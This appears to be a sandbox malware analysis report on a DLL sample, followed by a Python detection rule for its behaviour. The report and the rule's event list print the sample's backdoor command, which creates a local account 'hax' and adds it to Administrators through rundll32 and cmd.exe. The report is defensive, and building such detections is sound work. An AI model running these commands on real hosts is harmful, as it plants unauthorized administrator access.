Analysis
max time kernel: 91s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20231215-en
resource tags: arch:x64 arch:x86 image:win10v2004-20231215-en locale:en-us os:windows10-2004-x64 system
submitted: 12/02/2024, 02:46
Static task: static1
Behavioral task: behavioral1
  Sample: 7ac7ebc5884f6bbf049513de2c0384a9ff6f15194c23e66c23378010ec3a4056.dll
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: 7ac7ebc5884f6bbf049513de2c0384a9ff6f15194c23e66c23378010ec3a4056.dll
  Resource: win10v2004-20231215-en
General
Target: 7ac7ebc5884f6bbf049513de2c0384a9ff6f15194c23e66c23378010ec3a4056.dll
Size: 523KB
MD5: 4343b9f0e1e7c48438540363710bb73d
SHA1: 83407f59bc3e32b25405675c4b05b2e7f8156421
SHA256: 7ac7ebc5884f6bbf049513de2c0384a9ff6f15194c23e66c23378010ec3a4056
SHA512: 6a7222b8741682d8d6bab5c28225f26f985944eab0657a0eb07eb4d75d395554d8b859c11030440aaf7829e9ce14f03cbc62d09a350a424bc604ab70b3a08c40
SSDEEP: 6144:vif0g6k/mf3vpjfUnvCstwmeiUJ5s/yna2i35PFJF/h7yQ6:vK0gjmf3xfU6suxjTs/QbitX/
Malware Config
Signatures
Grants admin privileges (1 TTP)
Creates a new local user account ("hax", password "hax") with net.exe and then adds it to the local Administrators group, leaving a backdoor administrator account on the host. Both the account name and the password are passed on the command line, so they are fully visible in process-creation telemetry.
Runs net.exe
Suspicious use of WriteProcessMemory (10 IoCs)
Each parent/child pair below is recorded twice and corresponds to one process-creation edge in the tree under Processes; the parent writes into the new child's address space as part of spawning it, so this signature also fires for ordinary process creation and is a weak indicator on its own.
description | pid | Process | procid_target
PID 1204 wrote to memory of 3440 | 1204 | rundll32.exe | 84
PID 1204 wrote to memory of 3440 | 1204 | rundll32.exe | 84
PID 3440 wrote to memory of 2620 | 3440 | cmd.exe | 86
PID 3440 wrote to memory of 2620 | 3440 | cmd.exe | 86
PID 2620 wrote to memory of 3604 | 2620 | net.exe | 87
PID 2620 wrote to memory of 3604 | 2620 | net.exe | 87
PID 3440 wrote to memory of 3276 | 3440 | cmd.exe | 88
PID 3440 wrote to memory of 3276 | 3440 | cmd.exe | 88
PID 3276 wrote to memory of 2164 | 3276 | net.exe | 89
PID 3276 wrote to memory of 2164 | 3276 | net.exe | 89
Processes
C:\Windows\system32\rundll32.exe (PID 1204)
  command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\7ac7ebc5884f6bbf049513de2c0384a9ff6f15194c23e66c23378010ec3a4056.dll,#1
  (the ",#1" suffix makes rundll32 call the DLL's export with ordinal 1)
  signatures: Suspicious use of WriteProcessMemory
  C:\Windows\system32\cmd.exe (PID 3440)
    command line: /K net user /add hax hax && net localgroup administrators hax /add
    signatures: Suspicious use of WriteProcessMemory
    C:\Windows\system32\net.exe (PID 2620)
      command line: net user /add hax hax
      signatures: Suspicious use of WriteProcessMemory
      C:\Windows\system32\net1.exe (PID 3604)
        command line: C:\Windows\system32\net1 user /add hax hax
    C:\Windows\system32\net.exe (PID 3276)
      command line: net localgroup administrators hax /add
      signatures: Suspicious use of WriteProcessMemory
      C:\Windows\system32\net1.exe (PID 2164)
        command line: C:\Windows\system32\net1 localgroup administrators hax /add
(net.exe hands each command to net1.exe, which is why every net command appears twice in the tree.)
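The process tree above is a compact, high-signal pattern for a detection rule: a local account is created and then added to Administrators, and the whole chain hangs off rundll32.exe. The following is an added example, not tria.ge's code or anything shipped by the sample's author. It rebuilds the tree from process-creation events (the event list below is constructed from the report's PIDs and command lines; the field names pid/ppid/image/cmdline are an assumption, map them to your own telemetry such as Sysmon Event ID 1) and correlates the two net commands per process lineage. It handles both argument orders net.exe accepts, splits cmd.exe command lines on && so the cmd.exe line alone is enough to fire, and raises severity when a LOLBin such as rundll32.exe is in the ancestry. The list of Administrators group names is an assumption; add localized names for non-English hosts.

```python
import re

NET_NAMES = {"net", "net.exe", "net1", "net1.exe"}
# Assumption: English group name only; extend for localized builds (e.g. "administratoren").
ADMIN_GROUPS = {"administrators"}
SUSPICIOUS_PARENTS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Constructed from the report's process tree; not captured telemetry.
EVENTS = [
    {"pid": 1204, "ppid": 0, "image": r"C:\Windows\system32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\Admin\AppData\Local\Temp\7ac7ebc5884f6bbf049513de2c0384a9ff6f15194c23e66c23378010ec3a4056.dll,#1"},
    {"pid": 3440, "ppid": 1204, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"/K net user /add hax hax && net localgroup administrators hax /add"},
    {"pid": 2620, "ppid": 3440, "image": r"C:\Windows\system32\net.exe",
     "cmdline": "net user /add hax hax"},
    {"pid": 3604, "ppid": 2620, "image": r"C:\Windows\system32\net1.exe",
     "cmdline": r"C:\Windows\system32\net1 user /add hax hax"},
    {"pid": 3276, "ppid": 3440, "image": r"C:\Windows\system32\net.exe",
     "cmdline": "net localgroup administrators hax /add"},
    {"pid": 2164, "ppid": 3276, "image": r"C:\Windows\system32\net1.exe",
     "cmdline": r"C:\Windows\system32\net1 localgroup administrators hax /add"},
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _net_args(segment):
    """Tokens following the net/net1 verb, or None if this segment is not a net command."""
    toks = segment.split()
    for i, t in enumerate(toks):
        if _basename(t) in NET_NAMES:
            return toks[i + 1:]
    return None


def user_added(segment):
    """Account name from 'net user <name> [pw] /add' or 'net user /add <name> [pw]', else None."""
    args = _net_args(segment)
    if not args or args[0].lower() != "user":
        return None
    rest = args[1:]
    if "/add" not in (a.lower() for a in rest):
        return None
    positional = [a for a in rest if not a.startswith("/")]
    return positional[0] if positional else None


def admin_member_added(segment):
    """Account name from 'net localgroup administrators <name> /add', else None."""
    args = _net_args(segment)
    if not args or args[0].lower() != "localgroup":
        return None
    rest = args[1:]
    if "/add" not in (a.lower() for a in rest):
        return None
    positional = [a for a in rest if not a.startswith("/")]
    if len(positional) >= 2 and positional[0].lower() in ADMIN_GROUPS:
        return positional[1]
    return None


def segments(cmdline):
    """Split a cmd.exe command line on && / || / & so chained commands are inspected one by one."""
    return [s for s in re.split(r"\s*(?:&&|\|\||&)\s*", cmdline) if s]


def detect(events):
    """Correlate account creation and Administrators membership per process lineage."""
    by_pid = {e["pid"]: e for e in events}

    def lineage(pid):
        chain = []
        while pid in by_pid:
            chain.append(by_pid[pid])
            pid = by_pid[pid]["ppid"]
        return chain

    created, elevated = {}, {}
    for e in events:
        root = lineage(e["pid"])[-1]["pid"]  # topmost known ancestor groups the two steps
        for seg in segments(e["cmdline"]):
            user = user_added(seg)
            if user:
                created.setdefault((root, user.lower()), set()).add(e["pid"])
            user = admin_member_added(seg)
            if user:
                elevated.setdefault((root, user.lower()), set()).add(e["pid"])

    findings = []
    for root, user in created.keys() & elevated.keys():
        pids = created[(root, user)] | elevated[(root, user)]
        ancestors = {_basename(p["image"]) for pid in pids for p in lineage(pid)}
        findings.append({
            "user": user,
            "root_pid": root,
            "root_image": _basename(by_pid[root]["image"]),
            "pids": sorted(pids),
            "severity": "high" if ancestors & SUSPICIOUS_PARENTS else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f)
```

Keying on the topmost ancestor rather than the immediate parent is what lets the two net.exe children (2620 and 3276), their net1.exe grandchildren and the cmd.exe line all collapse into one finding for the same account; in production, bound the lineage walk by time or session, since a long-lived root such as explorer.exe would otherwise merge unrelated activity.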